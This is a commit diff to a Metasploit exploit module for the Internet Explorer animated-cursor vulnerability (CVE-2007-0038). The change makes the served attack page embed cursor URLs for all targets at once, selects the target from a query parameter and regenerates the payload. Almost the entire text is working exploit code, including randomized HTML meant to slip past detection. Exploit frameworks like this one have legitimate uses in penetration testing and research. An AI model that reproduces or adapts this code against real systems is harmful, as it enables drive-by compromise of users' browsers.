This module now defaults to using all targets at once :-)

git-svn-id: file:///home/svn/framework3/trunk@4596 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-01 18:25:14 +00:00
parent e707423987
commit 24ba17aceb
1 changed files with 47 additions and 23 deletions

View File

@ -71,6 +71,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
#
# Use multiple cursor URLs to try all targets at once
# This can result in multiple, sequential sessions
#
[ 'All Targets', { }],
#
# The following targets use call [ebx+4], just like the original exploit
#
@ -117,37 +123,57 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
end
def on_request_uri(cli, request)
targ = nil
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
gext = exts[rand(exts.length)]
mext = request.uri =~ /\.(...)$/
ruri, qstr = request.uri.split('?')
if (qstr and qstr =~ /.*=(\d+)/)
targ = $1.to_i
end
mext = ruri =~ /\.(...)$/
if (not (mext and exts.include?($1)))
html =
"<html><head><title>" + rand_text_alphanumeric(rand(128)+4) +
"</title></head><body>" + rand_text_english(rand(1024)+1) +
"<div style='" +
generate_css_padding() +
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
'"' +
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
'"' +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
"</div>"
"<html><head><title>" +
rand_text_alphanumeric(rand(128)+4) +
"</title>" +
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
mytargs = (target.name =~ /All Targets/) ? targets : [target]
mytargs.each_index do |i|
html << "<div style='" +
generate_css_padding() +
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
'"' +
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
'"' +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
"</div>"
end
send_response_html(cli, html)
return
end
# Set the requested target
if (targ and targets[targ])
target = targets[targ]
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
@ -250,8 +276,6 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
end
def generate_css_padding
return ''
buf =
generate_whitespace() +
"/*" +